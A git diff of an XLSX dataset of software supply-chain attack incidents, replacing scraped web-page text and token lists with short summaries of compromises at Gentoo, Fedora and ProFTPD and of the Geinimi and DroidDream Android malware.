--- a/server/datasets/Dataset1_SSCA_copy.xlsx
+++ b/server/datasets/Dataset1_SSCA_copy.xlsx
@@ -425,7 +425,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:E184"/>
+  <dimension ref="A1:D184"/>
   <sheetViews>
     <sheetView workbookViewId="0">
       <selection activeCell="A1" sqref="A1"/>
@@ -454,11 +454,6 @@
           <t>Reference</t>
         </is>
       </c>
-      <c r="E1" s="1" t="inlineStr">
-        <is>
-          <t>Tokens</t>
-        </is>
-      </c>
     </row>
     <row r="2">
       <c r="A2" t="inlineStr">
@@ -473,17 +468,12 @@
       </c>
       <c r="C2" t="inlineStr">
         <is>
-          <t>archives gentoo gentooorg sites gentooorg wiki bugs forums packages planet archives sources infra status home archives gentooannounce gentoo archives gentooannounce daniel robbins drobbinsgo gentooannouncego bugtraq×××××××××××××com subject gentooannounce glsa rsyncgentooorg rotation server compromised date messageid 107047401715117101camelhtgentooorg gentoo linux announcement glsa summary rsyncgentooorg rotation server compromised severity normal date none exploit remote description december approximately servers makes rsyncgentooorg rotation compromised remote exploit point still performing forensic analysis however compromised system file integrity checker installed detailed forensic trail happened breached weare reasonably confident portage tree stored wasunaffected attacker appears installed rootkit modifieddeleted files cover tracks left server otherwise untouched compromised state approximately hour discovered shut time approximately users synchronized portage mirror stored method used gain access remotely still investigation release details ascertained cause remote exploit official gentoo infrastructure instead donated sponsor provides services well sponsor requested publicly identify time gentoo part appears unaffected exploit currently honoring sponsors request said point determine file portage tree modified release full details compromised server solution based forensic analysis done reasonably confident files within portage tree affected however server removed rsyncgentooorg rotations remain forensic analysis completed wiped rebuilt thus users preferring extra level ensure correct accurate portage tree running emerge sync perform sync another server ensure files date attachments file name mime type signatureasc applicationpgpsignature report message find marc find google groups times displayed gmt0 contents reflect opinion author gentoo project gentoo foundation questions comments please feel free contact 2001–2020 gentoo foundation gentoo trademark gentoo foundation contents document unless otherwise expressly stated licensed ccbysa40 license gentoo name logo usage guidelines apply</t>
+          <t>One of the servers that makes up the rsync.gentoo.org rotation was compromised via a remote exploit.</t>
         </is>
       </c>
       <c r="D2" t="inlineStr">
         <is>
           <t>https://archives.gentoo.org/gentoo-announce/message/7b0581416ddd91522c14513cb789f17a</t>
-        </is>
-      </c>
-      <c r="E2" t="inlineStr">
-        <is>
-          <t>['archive', 'site', 'forum', 'planet', 'archive', 'source', 'status', 'home', 'archive', 'archive', 'rsyncgentooorg', 'rotation', 'server', 'date', 'announcement', 'summary', 'rsyncgentooorg', 'rotation', 'server', 'severity', 'normal', 'date', 'none', 'remote', 'description', 'server', 'rsyncgentooorg', 'rotation', 'remote', 'exploit', 'point', 'forensic', 'analysis', 'system', 'file', 'integrity', 'checker', 'detailed', 'forensic', 'trail', 'breached', 'confident', 'portage', 'tree', 'attacker', 'rootkit', 'file', 'track', 'server', 'untouched', 'state', 'hour', 'time', 'user', 'portage', 'mirror', 'method', 'gain', 'access', 'investigation', 'release', 'detail', 'remote', 'official', 'gentoo', 'infrastructure', 'sponsor', 'service', 'sponsor', 'time', 'gentoo', 'part', 'unaffected', 'sponsor', 'point', 'file', 'portage', 'tree', 'release', 'full', 'detail', 'server', 'solution', 'forensic', 'analysis', 'confident', 'file', 'portage', 'tree', 'server', 'rsyncgentooorg', 'rotation', 'forensic', 'analysis', 'user', 'extra', 'level', 'correct', 'accurate', 'portage', 'tree', 'sync', 'server', 'file', 'date', 'attachment', 'file', 'name', 'mime', 'type', 'message', 'marc', 'group', 'time', 'content', 'opinion', 'author', 'project', 'gentoo', 'foundation', 'question', 'comment', 'free', 'contact', 'gentoo', 'foundation', 'gentoo', 'foundation', 'content', 'document', 'ccbysa40', 'license', 'gentoo', 'name', 'logo', 'usage', 'guideline']</t>
         </is>
       </c>
     </row>
@@ -500,17 +490,12 @@
       </c>
       <c r="C3" t="inlineStr">
         <is>
-          <t>infrastructure report paul frields stickster gmailcom previous message thread infrastructure status next message thread fedora unity releases fedora respin messages sorted date thread subject author last week discovered fedora servers illegally accessed intrusion servers quickly discovered servers taken offline specialists administrators working since analyze intrusion extent compromise well reinstall fedora systems using requisite outages opportunity upgrades sake functionality well work ongoing please patient anyone pertinent information relating event asked contact fedoralegal redhatcom compromised fedora servers system used signing fedora packages however based efforts high confidence intruder able capture passphrase used secure fedora package signing based review date passphrase used time intrusion system passphrase stored fedora servers definitive evidence fedora compromised fedora packages distributed multiple thirdparty mirrors repositories decided convert fedora signing keys require affirmative steps every fedora system owner administrator widely clearly communicate steps help users available among analyses also done numerous checks fedora package collection significant amount source verification well found discrepancies would indicate loss package integrity efforts also resulted discovery additional vulnerabilities packages provided fedora previous warnings package updates based abundance caution respect users also proceeding plans change fedora package signing already started planning implementing additional safeguards future time confident little risk fedora users wish install upgrade signed fedora packages connection events detected intrusion certain computer systems issued communication enterprise linux users found httprhnredhatcomerratarhsa20080855html communication states part last week detected intrusion certain computer systems took immediate action investigation intrusion ongoing initial focus review test distribution channel customers network associated measures based efforts remain highly confident systems processes prevented intrusion compromising content distributed accordingly believe customers keep systems updated using network risk issuing alert primarily obtain binary packages channels official subscribers important note effects intrusion fedora accordingly fedora package signing connected different used sign enterprise linux packages furthermore fedora package signing also connected different used sign community extra packages enterprise linux epel packages continue keep fedora community notified updates thank patience paul frields fingerprint 3da6 a0ac 6d58 fec4 acdb c937 bd11 httppaulfrieldsorg httppfrieldsfedorapeopleorg ircfreenodenet stickster fedoradocs fedoradevel fredlug next part nontext attachment scrubbed name signatureasc type applicationpgpsignature size bytes desc digitally signed message part httplistmanredhatcomarchivesfedoraannouncelistattachments20080822af252660attachmentsig previous message thread infrastructure status next message thread fedora unity releases fedora respin messages sorted date thread subject author information fedoraannouncelist mailing list</t>
+          <t>Fedora servers were illegally accessed. One of the compromised Fedora servers was a system used for signing Fedora packages.</t>
         </is>
       </c>
       <c r="D3" t="inlineStr">
         <is>
           <t>https://www.redhat.com/archives/fedora-announce-list/2008-August/msg00012.html</t>
-        </is>
-      </c>
-      <c r="E3" t="inlineStr">
-        <is>
-          <t>['stickster', 'gmailcom', 'previous', 'message', 'thread', 'infrastructure', 'status', 'next', 'message', 'thread', 'fedora', 'unity', 'fedora', 'respin', 'message', 'date', 'thread', 'subject', 'author', 'last', 'week', 'fedora', 'server', 'intrusion', 'server', 'server', 'offline', 'specialist', 'administrator', 'analyze', 'intrusion', 'extent', 'compromise', 'fedora', 'system', 'requisite', 'outage', 'opportunity', 'upgrade', 'sake', 'functionality', 'ongoing', 'pertinent', 'information', 'event', 'contact', 'redhatcom', 'fedora', 'server', 'system', 'signing', 'fedora', 'package', 'effort', 'high', 'confidence', 'intruder', 'able', 'capture', 'passphrase', 'secure', 'fedora', 'package', 'signing', 'review', 'date', 'passphrase', 'time', 'intrusion', 'system', 'passphrase', 'fedora', 'server', 'definitive', 'evidence', 'fedora', 'fedora', 'package', 'multiple', 'thirdparty', 'mirror', 'repository', 'convert', 'fedora', 'signing', 'key', 'affirmative', 'step', 'fedora', 'system', 'owner', 'administrator', 'step', 'user', 'available', 'analysis', 'numerous', 'check', 'fedora', 'package', 'collection', 'significant', 'amount', 'source', 'verification', 'discrepancy', 'loss', 'package', 'integrity', 'effort', 'discovery', 'additional', 'vulnerability', 'package', 'fedora', 'previous', 'warning', 'package', 'update', 'abundance', 'caution', 'respect', 'user', 'plan', 'fedora', 'package', 'signing', 'additional', 'safeguard', 'future', 'time', 'confident', 'little', 'risk', 'fedora', 'user', 'fedora', 'package', 'connection', 'event', 'intrusion', 'certain', 'computer', 'system', 'communication', 'enterprise', 'user', 'communication', 'state', 'part', 'last', 'week', 'intrusion', 'certain', 'computer', 'system', 'immediate', 'action', 'investigation', 'intrusion', 'ongoing', 'initial', 'focus', 'review', 'test', 'distribution', 'channel', 'customer', 'network', 'measure', 'effort', 'confident', 'system', 'process', 'intrusion', 'content', 'customer', 'system', 'network', 'risk', 'alert', 'binary', 'package', 'official', 'subscriber', 'important', 'note', 'effect', 'intrusion', 'fedora', 'package', 'signing', 'different', 'sign', 'enterprise', 'fedora', 'package', 'signing', 'different', 'sign', 'community', 'extra', 'package', 'enterprise', 'package', 'fedora', 'community', 'update', 'patience', 'fingerprint', 'acdb', 'next', 'part', 'nontext', 'attachment', 'name', 'applicationpgpsignature', 'size', 'byte', 'desc', 'message', 'part', 'previous', 'message', 'thread', 'infrastructure', 'status', 'next', 'message', 'thread', 'fedora', 'unity', 'fedora', 'respin', 'message', 'date', 'thread', 'subject', 'author', 'information', 'fedoraannouncelist', 'mailing', 'list']</t>
         </is>
       </c>
     </row>
@@ -527,17 +512,12 @@
       </c>
       <c r="C4" t="inlineStr">
         <is>
-          <t>skip content search products services operations research research naked sophos life search open main menu search products services operations research research naked sophos life naked insights education advice cybersecurity issues threats september update naked consolidate intelligence news location migrated naked sophos news platform naked august mom’s meals issues “notice data event” know took months notifications start still dont know exactly went heres advice naked august ep149 many cryptographers take change light bulb latest episode listen full transcript inside naked august using winrar sure patch code execution bugs… imagine clicked harmlesslooking image unknown application fired instead naked august smart light bulbs could give away password secrets cryptography isnt secrecy need take care authenticity imposters integrity tampering well naked august “snakes airplane mode” phone says it’s offline isn’t wysiwyg short except isnt naked august ep148 remembering crypto heroes celebrating true crypto bros listen full transcript available naked august warns scams lure mobile betatester apps iphone must come store except dont explain look naked august “grab hold give wiggle” card skimming still thing rise taptopay chipandpin hasnt world card skimming criminals naked load subscribe latest updates inbox categories interested you’re subscribed change region américa latina brasil deutschland english france iberia italia japan terms privacy privacy notice cookies legal general modern slavery statement speak sophos rights reserved</t>
+          <t>According to a blog post from the First Tech Credit Union, an app developer called 09Droid created applications which posed as a shell for mobile banking applications and published them to Android Marketplace, and in the process phished personal information about user bank accounts.</t>
         </is>
       </c>
       <c r="D4" t="inlineStr">
         <is>
           <t>https://nakedsecurity.sophos.com/2010/01/11/banking-malware-android-marketplace/</t>
-        </is>
-      </c>
-      <c r="E4" t="inlineStr">
-        <is>
-          <t>['content', 'search', 'product', 'service', 'operation', 'research', 'research', 'naked', 'sophos', 'life', 'open', 'main', 'menu', 'search', 'product', 'service', 'operation', 'research', 'research', 'naked', 'sophos', 'life', 'naked', 'insight', 'education', 'advice', 'cybersecurity', 'issue', 'threat', 'naked', 'consolidate', 'intelligence', 'news', 'location', 'naked', 'sophos', 'news', 'platform', 'naked', 'mom', 'meal', 'issue', 'notice', 'datum', 'event', 'month', 'notification', 'here', 'advice', 'naked', 'ep149', 'many', 'cryptographer', 'change', 'light', 'bulb', 'late', 'episode', 'full', 'transcript', 'naked', 'winrar', 'code', 'execution', 'bug', 'image', 'unknown', 'application', 'naked', 'smart', 'light', 'bulb', 'password', 'secret', 'cryptography', 'secrecy', 'care', 'authenticity', 'imposter', 'integrity', 'naked', 'snake', 'airplane', 'mode', 'phone', 'offline', 'wysiwyg', 'short', 'naked', 'hero', 'true', 'bro', 'full', 'transcript', 'available', 'naked', 'scam', 'mobile', 'betatester', 'app', 'iphone', 'store', 'naked', 'hold', 'wiggle', 'card', 'skimming', 'thing', 'rise', 'taptopay', 'chipandpin', 'world', 'card', 'skimming', 'criminal', 'naked', 'load', 'late', 'update', 'inbox', 'category', 'interested', 'change', 'region', 'privacy', 'cookie', 'legal', 'general', 'modern', 'slavery', 'statement', 'sophos', 'right']</t>
         </is>
       </c>
     </row>
@@ -554,17 +534,12 @@
       </c>
       <c r="C5" t="inlineStr">
         <is>
-          <t>found requested imagesblogsthreatlevel201003operationaurorawp0310fnlpdf httpsgoogleblogblogspotcom201001newapproachtochinahtml found server</t>
+          <t>A targeted user received a phishing email that allowed the attacker to install malware.  As a result, attackers had complete access to internal systems. They targeted sources of intellectual property, including software configuration management (SCM) systems accessible by the compromised system. The compromised system could also be leveraged to further penetrate the network.</t>
         </is>
       </c>
       <c r="D5" t="inlineStr">
         <is>
           <t>https://www.wired.com/images_blogs/threatlevel/2010/03/operationaurora_wp_0310_fnl.pdf  https://googleblog.blogspot.com/2010/01/new-approach-to-china.html</t>
-        </is>
-      </c>
-      <c r="E5" t="inlineStr">
-        <is>
-          <t>['server']</t>
         </is>
       </c>
     </row>
@@ -581,7 +556,7 @@
       </c>
       <c r="C6" t="inlineStr">
         <is>
-          <t>trending apple vision review fascinating flawed needs things tried headsets heres people chatgpt chatgpt plus subscription worth hours train fundamentals free upgrade windows home edition useful things flipper zero apple watch year metas rayban smart glasses useful gadget tested year iphone review upgrade samsung galaxy ultra review best smartphones year sonos review close perfect smart speaker need antivirus linux best laptops best vpns best best headphones best robot vacuums zdnet recommends tech gaming headphones laptops mobile accessories networking printers smartphones smart watches speakers streaming devices streaming services tablets wearables kitchen household office furniture office hardware appliances smart home smart lighting yard outdoors innovation artificial intelligence cloud digital transformation energy robotics sustainability transportation work life accelerate tech game paid content space race drive innovation metaverse change future work society managing multicloud future internet rules work tech trends watch business business amazon apple developer ecommerce edge computing enterprise software executive google microsoft professional development social media windows digital transformation trends insights success software development emerging trends changing roles cyber threats password manager ransomware cybersecurity lets tactical securing cloud advice deals howto product comparisons product spotlights reviews buying guides buying guides best allinone computers best budget best gaming cpus best gaming laptops best gaming best headphones best ipads best iphones best laptops best large tablets best oled best robot vacuum mops best rugged tablets best samsung phones best smart rings best smartphones best smartwatches best speakers best tablets best travel vpns best best vpns best coupons tomorrow belongs embrace today asia australia europe india united kingdom united states zdnet france zdnet germany zdnet korea zdnet japan popular topics finance education health special features zdnet depth zdnet recommends newsletters videos editorial guidelines trending apple vision review fascinating flawed needs things tried headsets heres people chatgpt chatgpt plus subscription worth hours train fundamentals free upgrade windows home edition useful things flipper zero apple watch year metas rayban smart glasses useful gadget tested year iphone review upgrade samsung galaxy ultra review best smartphones year sonos review close perfect smart speaker need antivirus linux best laptops best vpns best best headphones best robot vacuums zdnet recommends tech gaming headphones laptops mobile accessories networking printers smartphones smart watches speakers streaming devices streaming services tablets wearables kitchen household office furniture office hardware appliances smart home smart lighting yard outdoors innovation artificial intelligence cloud digital transformation energy robotics sustainability transportation work life accelerate tech game paid content space race drive innovation metaverse change future work society managing multicloud future internet rules work tech trends watch business business amazon apple developer ecommerce edge computing enterprise software executive google microsoft professional development social media windows digital transformation trends insights success software development emerging trends changing roles cyber threats password manager ransomware cybersecurity lets tactical securing cloud advice deals howto product comparisons product spotlights reviews buying guides buying guides best allinone computers best budget best gaming cpus best gaming laptops best gaming best headphones best ipads best iphones best laptops best large tablets best oled best robot vacuum mops best rugged tablets best samsung phones best smart rings best smartphones best smartwatches best speakers best tablets best travel vpns best best vpns best coupons topics finance education health special features zdnet depth zdnet recommends newsletters videos editorial guidelines uhoh back zdnet homepage probably page you’re looking sorry zdnet equip harness power disruptive innovation work home topics galleries videos sell share personal information zdnet meet team sitemap reprint policy join newsletters site assistance licensing zdnet ventures company rights reserved privacy policy cookie settings advertise terms</t>
+          <t>The open-source ProFTPD project has been hacked by unknown attackers who planted a backdoor in the source code.  As a result of the hack, the project's main FTP server, as well as all of the mirror servers, have carried compromised versions of the ProFTPD1.3.3c source code, from the November 28 2010 to December 2 2010.</t>
         </is>
       </c>
       <c r="D6" t="inlineStr">
@@ -590,11 +565,6 @@
 https://www.aldeid.com/wiki/Exploits/proftpd-1.3.3c-backdoor</t>
         </is>
       </c>
-      <c r="E6" t="inlineStr">
-        <is>
-          <t>['apple', 'vision', 'review', 'fascinating', 'flawed', 'need', 'thing', 'headset', 'here', 'people', 'subscription', 'worth', 'hour', 'train', 'fundamental', 'free', 'window', 'home', 'edition', 'useful', 'thing', 'apple', 'watch', 'year', 'rayban', 'smart', 'glass', 'useful', 'gadget', 'year', 'iphone', 'review', 'upgrade', 'ultra', 'review', 'good', 'smartphone', 'year', 'close', 'perfect', 'smart', 'speaker', 'good', 'laptop', 'vpns', 'good', 'headphone', 'good', 'robot', 'vacuum', 'tech', 'gaming', 'headphone', 'laptop', 'mobile', 'accessory', 'networking', 'printer', 'smartphone', 'smart', 'watch', 'speaker', 'streaming', 'device', 'streaming', 'service', 'tablet', 'kitchen', 'household', 'office', 'furniture', 'office', 'hardware', 'appliance', 'smart', 'home', 'smart', 'lighting', 'yard', 'innovation', 'artificial', 'intelligence', 'energy', 'robotic', 'sustainability', 'transportation', 'work', 'life', 'tech', 'game', 'content', 'space', 'race', 'drive', 'innovation', 'metaverse', 'future', 'work', 'society', 'multicloud', 'future', 'internet', 'rule', 'tech', 'trend', 'business', 'business', 'developer', 'edge', 'computing', 'enterprise', 'software', 'executive', 'social', 'medium', 'digital', 'transformation', 'trend', 'insight', 'success', 'software', 'development', 'trend', 'role', 'cyber', 'threat', 'password', 'manager', 'cybersecurity', 'tactical', 'securing', 'cloud', 'advice', 'deal', 'howto', 'product', 'comparison', 'product', 'spotlight', 'review', 'guide', 'guide', 'good', 'allinone', 'computer', 'good', 'budget', 'good', 'gaming', 'cpus', 'good', 'gaming', 'laptop', 'good', 'headphone', 'good', 'ipad', 'good', 'iphone', 'good', 'laptop', 'good', 'large', 'tablet', 'good', 'robot', 'vacuum', 'rugged', 'tablet', 'good', 'phone', 'good', 'smart', 'ring', 'good', 'smartphone', 'good', 'smartwatche', 'good', 'speaker', 'good', 'tablet', 'good', 'vpns', 'good', 'vpns', 'good', 'coupon', 'tomorrow', 'embrace', 'topic', 'finance', 'education', 'health', 'special', 'zdnet', 'depth', 'newsletter', 'video', 'editorial', 'guideline', 'apple', 'vision', 'review', 'fascinating', 'flawed', 'need', 'thing', 'headset', 'here', 'people', 'subscription', 'worth', 'hour', 'train', 'fundamental', 'free', 'window', 'home', 'edition', 'useful', 'thing', 'apple', 'watch', 'year', 'rayban', 'smart', 'glass', 'useful', 'gadget', 'year', 'iphone', 'review', 'upgrade', 'ultra', 'review', 'good', 'smartphone', 'year', 'close', 'perfect', 'smart', 'speaker', 'good', 'laptop', 'vpns', 'good', 'headphone', 'good', 'robot', 'vacuum', 'tech', 'gaming', 'headphone', 'laptop', 'mobile', 'accessory', 'networking', 'printer', 'smartphone', 'smart', 'watch', 'speaker', 'streaming', 'device', 'streaming', 'service', 'tablet', 'kitchen', 'household', 'office', 'furniture', 'office', 'hardware', 'appliance', 'smart', 'home', 'smart', 'lighting', 'yard', 'innovation', 'artificial', 'intelligence', 'energy', 'robotic', 'sustainability', 'transportation', 'work', 'life', 'tech', 'game', 'content', 'space', 'race', 'drive', 'innovation', 'metaverse', 'future', 'work', 'society', 'multicloud', 'future', 'internet', 'rule', 'tech', 'trend', 'business', 'business', 'developer', 'edge', 'computing', 'enterprise', 'software', 'executive', 'social', 'medium', 'digital', 'transformation', 'trend', 'insight', 'success', 'software', 'development', 'trend', 'role', 'cyber', 'threat', 'password', 'manager', 'cybersecurity', 'tactical', 'securing', 'cloud', 'advice', 'deal', 'howto', 'product', 'comparison', 'product', 'spotlight', 'review', 'guide', 'guide', 'good', 'allinone', 'computer', 'good', 'budget', 'good', 'gaming', 'cpus', 'good', 'gaming', 'laptop', 'good', 'headphone', 'good', 'ipad', 'good', 'iphone', 'good', 'laptop', 'good', 'large', 'tablet', 'good', 'robot', 'vacuum', 'rugged', 'tablet', 'good', 'phone', 'good', 'smart', 'ring', 'good', 'smartphone', 'good', 'smartwatche', 'good', 'speaker', 'good', 'tablet', 'good', 'vpns', 'good', 'vpns', 'good', 'coupon', 'topic', 'finance', 'education', 'health', 'special', 'zdnet', 'depth', 'newsletter', 'video', 'editorial', 'guideline', 'homepage', 'page', 'sorry', 'harness', 'power', 'disruptive', 'innovation', 'work', 'home', 'topic', 'gallery', 'video', 'share', 'personal', 'information', 'meet', 'team', 'sitemap', 'reprint', 'policy', 'join', 'site', 'assistance', 'company', 'right', 'privacy', 'policy', 'cookie', 'setting', 'term']</t>
-        </is>
-      </c>
     </row>
     <row r="7">
       <c r="A7" t="inlineStr">
@@ -609,17 +579,12 @@
       </c>
       <c r="C7" t="inlineStr">
         <is>
-          <t>page found oops page youre trying view isnt popular pages check instead protect mobile devices lookout endpoint lookout endpoint additional links lookout mobile endpoint lookout intelligence enterprise data protection lookout cloud lookout cloud additional links lookout secure cloud access casb lookout secure internet access lookout secure private access ztna legal privacy policy cookie policy transparency report sell share personal information compliance info compliance info sitemap lookout lookout® lookout shield design® lookout shield design® lookout multicolormultishaded wingspan design® registered trademarks lookout united states countries shecurity® lookout mobile security® powered lookout® registered trademarks lookout united states lookout maintains common trademark rights everything protected lookout ciphercloud shield design lookout cloud cloud lookout secure cloud access lookout secure internet access lookout secure private access lookout endpoint endpoint lookout mobile endpoint lookout intelligence solutions secure hybrid work meet compliance privacy regulations promote collaboration safely detect mitigate threats adopt cloud faster accelerate mergers acquisitions industries healthcare education federal government state local government financial services manufacturing support enterprise support login enterprise support programs contact</t>
+          <t xml:space="preserve">Dubbed Geinimi based on its first known incarnation, this Trojan can compromise a significant amount of personal data on a phone and send it to remote servers. Once the malware is installed, it has the potential to receive commands from a remote server that allow the owner of that server to control the phone. Geinimi is effectively being grafted onto repackaged versions of legitimate applications, primarily games, and distributed in third-party Chinese Android app markets. </t>
         </is>
       </c>
       <c r="D7" t="inlineStr">
         <is>
           <t>https://blog.lookout.com/security-alert-geinimi-sophisticated-new-android-trojan-found-in-wild</t>
-        </is>
-      </c>
-      <c r="E7" t="inlineStr">
-        <is>
-          <t>['page', 'oop', 'page', 'view', 'popular', 'page', 'mobile', 'device', 'lookout', 'endpoint', 'lookout', 'endpoint', 'additional', 'link', 'mobile', 'endpoint', 'lookout', 'intelligence', 'enterprise', 'datum', 'protection', 'additional', 'link', 'secure', 'cloud', 'access', 'casb', 'lookout', 'secure', 'internet', 'access', 'lookout', 'private', 'access', 'privacy', 'policy', 'cookie', 'policy', 'transparency', 'report', 'share', 'personal', 'information', 'compliance', 'info', 'compliance', 'info', 'sitemap', 'lookout', 'lookout', '®', 'lookout', 'shield', 'design', '®', 'lookout', 'shield', 'design', 'trademark', 'lookout', 'lookout', 'mobile', 'security', '®', 'lookout', '®', 'trademark', 'lookout', 'lookout', 'common', 'trademark', 'right', 'lookout', 'design', 'lookout', 'cloud', 'access', 'lookout', 'secure', 'internet', 'access', 'lookout', 'private', 'access', 'lookout', 'endpoint', 'endpoint', 'mobile', 'endpoint', 'lookout', 'intelligence', 'solution', 'hybrid', 'work', 'meet', 'compliance', 'privacy', 'regulation', 'collaboration', 'mitigate', 'threat', 'cloud', 'merger', 'acquisition', 'industry', 'education', 'federal', 'government', 'state', 'local', 'government', 'financial', 'service', 'manufacturing', 'support', 'enterprise', 'support', 'login', 'enterprise', 'support', 'program']</t>
         </is>
       </c>
     </row>
@@ -636,17 +601,12 @@
       </c>
       <c r="C8" t="inlineStr">
         <is>
-          <t>incident fedora infrastructure jared smith jsmith fedoraprojectorg previous message outage phx2 network outage next message fedora system 64bit official release messages sorted date thread subject author summary fedora infrastructure intrusion impact product integrity january fedora contributor received email fedora accounts system indicating account details changed contacted fedora infrastructure team indicating received email made changes account infrastructure team immediately began investigating confirmed account indeed compromised time infrastructure team evidence indicates account credentials compromised externally fedora infrastructure subject code vulnerability exploit account question member sysadmin release engineering groups following complete list privileges account fedorapeopleorg user permissions limited machine push access packages fedora ability perform builds make updates fedora packages infrastructure team took following actions notified issue lock access compromised account take filesystem snapshots systems account access pkgsfedoraprojectorg fedorapeopleorg audit koji logs time compromise present found attacker change accounts login fedorapeopleorg attacker push changes fedora access pkgsfedoraprojectorg generate koji cert perform builds push package updates based results investigation believe fedora packages fedora contributor accounts affected compromise user question ability commit fedora infrastructure team believe compromised account used cause builds updates fedora build system infrastructure team believes fedora users threatened breach found evidence compromise extended beyond single account always fedora packagers recommended regularly review commits packages report suspicious activity notice fedora contributors strongly encouraged choose strong password contributors password websites user accounts receive email notifying changes account make please contact fedora infrastructure team immediately admin fedoraprojectorg still performing indepth investigation audit post material changes understanding jared smith fedora project leader previous message outage phx2 network outage next message fedora system 64bit official release messages sorted date thread subject author information announce mailing list</t>
+          <t>A Fedora contributor account with push access to packages in the Fedora SCM and the ability to perform builds and make updates to Fedora package was compromised.</t>
         </is>
       </c>
       <c r="D8" t="inlineStr">
         <is>
           <t>https://lists.fedoraproject.org/pipermail/announce/2011-January/002911.html</t>
-        </is>
-      </c>
-      <c r="E8" t="inlineStr">
-        <is>
-          <t>['incident', 'fedora', 'infrastructure', 'previous', 'message', 'outage', 'network', 'outage', 'next', 'message', 'fedora', 'system', '64bit', 'official', 'release', 'message', 'date', 'thread', 'subject', 'author', 'summary', 'fedora', 'infrastructure', 'intrusion', 'impact', 'product', 'integrity', 'fedora', 'contributor', 'email', 'fedora', 'account', 'system', 'account', 'detail', 'contacted', 'fedora', 'infrastructure', 'team', 'email', 'change', 'account', 'infrastructure', 'team', 'account', 'time', 'infrastructure', 'team', 'evidence', 'account', 'credential', 'infrastructure', 'subject', 'code', 'vulnerability', 'account', 'question', 'member', 'sysadmin', 'release', 'engineering', 'group', 'complete', 'list', 'privilege', 'fedorapeopleorg', 'user', 'permission', 'limited', 'machine', 'access', 'package', 'fedora', 'ability', 'build', 'update', 'fedora', 'package', 'infrastructure', 'team', 'action', 'issue', 'lock', 'access', 'account', 'filesystem', 'snapshot', 'system', 'account', 'log', 'time', 'compromise', 'present', 'attacker', 'change', 'account', 'fedorapeopleorg', 'attacker', 'change', 'fedora', 'access', 'pkgsfedoraprojectorg', 'koji', 'cert', 'perform', 'package', 'update', 'result', 'investigation', 'fedora', 'package', 'fedora', 'contributor', 'account', 'compromise', 'user', 'question', 'ability', 'fedora', 'infrastructure', 'team', 'account', 'cause', 'update', 'fedora', 'build', 'system', 'infrastructure', 'team', 'fedora', 'user', 'breach', 'evidence', 'compromise', 'single', 'account', 'packager', 'review', 'package', 'suspicious', 'activity', 'notice', 'fedora', 'contributor', 'strong', 'password', 'contributor', 'password', 'website', 'user', 'account', 'email', 'change', 'contact', 'fedora', 'infrastructure', 'team', 'fedoraprojectorg', 'indepth', 'investigation', 'audit', 'post', 'material', 'change', 'project', 'leader', 'previous', 'message', 'outage', 'network', 'outage', 'next', 'message', 'fedora', 'system', '64bit', 'official', 'release', 'message', 'date', 'thread', 'subject', 'author', 'information', 'mailing', 'list']</t>
         </is>
       </c>
     </row>
@@ -663,17 +623,12 @@
       </c>
       <c r="C9" t="inlineStr">
         <is>
-          <t>page found oops page youre trying view isnt popular pages check instead protect mobile devices lookout endpoint lookout endpoint additional links lookout mobile endpoint lookout intelligence enterprise data protection lookout cloud lookout cloud additional links lookout secure cloud access casb lookout secure internet access lookout secure private access ztna legal privacy policy cookie policy transparency report sell share personal information compliance info compliance info sitemap lookout lookout® lookout shield design® lookout shield design® lookout multicolormultishaded wingspan design® registered trademarks lookout united states countries shecurity® lookout mobile security® powered lookout® registered trademarks lookout united states lookout maintains common trademark rights everything protected lookout ciphercloud shield design lookout cloud cloud lookout secure cloud access lookout secure internet access lookout secure private access lookout endpoint endpoint lookout mobile endpoint lookout intelligence solutions secure hybrid work meet compliance privacy regulations promote collaboration safely detect mitigate threats adopt cloud faster accelerate mergers acquisitions industries healthcare education federal government state local government financial services manufacturing support enterprise support login enterprise support programs contact</t>
+          <t>Multiple applications available in the Official Android Market were found to contain malware which could compromise a significant amount of personal data. More than 50 applications have been found to be infected with a new type of Android malware called DroidDream.</t>
         </is>
       </c>
       <c r="D9" t="inlineStr">
         <is>
           <t>https://blog.lookout.com/security-alert-droiddream-malware-found-in-official-android-market</t>
-        </is>
-      </c>
-      <c r="E9" t="inlineStr">
-        <is>
-          <t>['page', 'oop', 'page', 'view', 'popular', 'page', 'mobile', 'device', 'lookout', 'endpoint', 'lookout', 'endpoint', 'additional', 'link', 'mobile', 'endpoint', 'lookout', 'intelligence', 'enterprise', 'datum', 'protection', 'additional', 'link', 'secure', 'cloud', 'access', 'casb', 'lookout', 'secure', 'internet', 'access', 'lookout', 'private', 'access', 'privacy', 'policy', 'cookie', 'policy', 'transparency', 'report', 'share', 'personal', 'information', 'compliance', 'info', 'compliance', 'info', 'sitemap', 'lookout', 'lookout', '®', 'lookout', 'shield', 'design', '®', 'lookout', 'shield', 'design', 'trademark', 'lookout', 'lookout', 'mobile', 'security', '®', 'lookout', '®', 'trademark', 'lookout', 'lookout', 'common', 'trademark', 'right', 'lookout', 'design', 'lookout', 'cloud', 'access', 'lookout', 'secure', 'internet', 'access', 'lookout', 'private', 'access', 'lookout', 'endpoint', 'endpoint', 'mobile', 'endpoint', 'lookout', 'intelligence', 'solution', 'hybrid', 'work', 'meet', 'compliance', 'privacy', 'regulation', 'collaboration', 'mitigate', 'threat', 'cloud', 'merger', 'acquisition', 'industry', 'education', 'federal', 'government', 'state', 'local', 'government', 'financial', 'service', 'manufacturing', 'support', 'enterprise', 'support', 'login', 'enterprise', 'support', 'program']</t>
         </is>
       </c>
     </row>
@@ -690,17 +645,12 @@
       </c>
       <c r="C10" t="inlineStr">
         <is>
-          <t>page found oops page youre trying view isnt popular pages check instead protect mobile devices lookout endpoint lookout endpoint additional links lookout mobile endpoint lookout intelligence enterprise data protection lookout cloud lookout cloud additional links lookout secure cloud access casb lookout secure internet access lookout secure private access ztna legal privacy policy cookie policy transparency report sell share personal information compliance info compliance info sitemap lookout lookout® lookout shield design® lookout shield design® lookout multicolormultishaded wingspan design® registered trademarks lookout united states countries shecurity® lookout mobile security® powered lookout® registered trademarks lookout united states lookout maintains common trademark rights everything protected lookout ciphercloud shield design lookout cloud cloud lookout secure cloud access lookout secure internet access lookout secure private access lookout endpoint endpoint lookout mobile endpoint lookout intelligence solutions secure hybrid work meet compliance privacy regulations promote collaboration safely detect mitigate threats adopt cloud faster accelerate mergers acquisitions industries healthcare education federal government state local government financial services manufacturing support enterprise support login enterprise support programs contact</t>
